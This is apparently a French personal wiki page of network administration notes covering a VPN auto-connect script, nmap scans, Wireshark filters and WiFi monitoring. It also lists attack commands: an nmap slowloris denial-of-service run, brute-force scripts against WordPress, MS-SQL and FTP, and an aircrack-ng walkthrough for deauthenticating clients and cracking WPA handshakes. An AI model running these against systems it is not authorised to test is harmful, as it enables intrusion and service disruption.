Table des matières
NetworkManager
Connecter le VPN automatiquement
Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :
- /etc/NetworkManager/dispatcher.d/vpn-up
#! /bin/bash REQUIRED_CONNECTION_NAME="<name-of-connection>" VPN_CONNECTION_NAME="<name-of-vpn-connection>" default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}") vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}") if [ "${default_conn}" -a ! "${vpn_conn}" ]; then nmcli con up id "${VPN_CONNECTION_NAME}" fi
Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.
ATTENTION !! ne pas oublier de le rendre exécutable !!
Nmap
Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.
Scan
Pour toutes les commandes ci-dessous on peut aussi faire un export en xml (converti ensuite en html) via la commande suivante :
nmap -sn 192.168.1.0/24 -oX test.xml; xsltproc test.xml -o test.html
Lister les hosts en ligne
nmap -sn 192.168.1.0/24
Scanne toutes les IP en 192.168.1.*
Afficher l'OS (root)
sudo nmap -O 192.168.1.51
Scan détaillé
nmap -A -T4 192.168.1.13
On ajoute -T4 pour une détection plus rapide (4 Threads)
Ports spécifiques (root)
On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :
nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080
Scanner sans résolution DNS (gain de temps)
Ajouter le commutateur -n
Détecter les services et leur version
nmap -sV 192.168.1.0/24
Scanner les ports TCP
nmap -sT 192.168.1.0/24
Scanner les ports UDP (root)
sudo nmap -sU 192.168.1.0/24
Techniques
Détection des CVE/vuln
nmap -Pn --script vuln 192.168.1.1
DOS (non-root)
nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Brute Force
WordPress
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
MS-SQL
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP
nmap --script ftp-brute -p 21 192.168.1.105
Check malwares
Script standard
nmap -sV --script=http-malware-host 192.168.1.105
Script Google
nmap -p80 --script http-google-malware infectedsite.com
Wireshark
Filtres
Expressions
== != <= >= < >
Opérateurs
AND | (ip.src==192.168.2.25) && (ip.dst==74.125.236.16) |
---|---|
OR | (ip.src==192.168.2.25)||(ip.dst==192.168.2.25) |
Filtres
IP Source | ip.src == 192.168.1.10 |
---|---|
IP Destination | ip.dst == 192.168.1.1 |
IP (les deux) | ip.addr == 192.168.1.10 |
IP / Hostnames / DNS
Hostname à partir de l'IP
getent hosts IP
Cela fonctionne aussi bien en LAN que sur des hosts distants.
WIFI
Observer le traffic
Créer une interface moniteur
sudo iw phy phy0 interface add mon0 type monitor
Lister les SSID
airodump-ng mon0
Supprimer une interface moniteur
sudo iw mon0 del
Tester la sécurité d'un réseau
Attention, ceci est à réaliser uniquement sur votre propre réseau, il est strictement interdit par la loi de le faire sur le réseau de quelqu'un d'autre sans son accord préalable et écrit. Vous êtes responsables de vos actes.
Nous utiliserons la populaire suite aircrack.
Le test de sécurité se déroule en 4 étapes principales : créer l'interface moniteur, cibler le réseau, récupérer le “handshake”, trouver le mot de passe.
Créer l'interface moniteur
sudo airmon-ng # lister les cartes réseau sudo airmon-ng start wlp3s0 # lancer l'interface moniteur sur la carte wlp3s0 -> wlp3s0mon
Cibler le réseau
sudo airodump-ng wlp3s0mon # Lister les points d'accès pour en choisir un sudo airodump-ng --write mon_reseau --bssid 00:11:22:AA:BB:CC -c 1 wlp3s0mon
–write spécifie le fichier pour les données récupérées –bssid spécifie l'adresse mac du réseau cible -c pour spécifier le canal du réseau cible
Récupérer le handshake
Dans un autre terminal, une autre fenêtre ou un autre onglet, saisir ceci pour récupérer le handshake. L'information apparaitra dans le airodump lancé précédemment. Cela peut prendre du temps, 10 secondes comme 15min…
sudo aireplay-ng -0 1 -e mon_reseau -a 00:11:22:AA:BB:CC -h 55:66:77:DD:EE:FF wlp3s0
-0 spécifie le type d'attaque (1 pour la des-authentification) -e spécifie le nom du réseau -a l'adresse mac du réseau -h l'adresse mac de la carte réseau utilisée
Trouver le mot de passe
Pour se faire, nous devons utiliser un dictionnaire. Saisir la commande suivante :
sudo aircrack-ng -a 2 -w /dossier/mon_dico.txt ./mon_reseau.cap
-a type d'attaque (2 pour WPA) -w chemin du dico (wordlist) ./mon_reseau.cap fichier de capture généré par airodump-ng
Cette dernière opération peut prendre des heures, selon la taille du dictionnaire (puisqu'il s'agit d'un brute-force).
Amusez vous bien, et faites pas de bétises ;)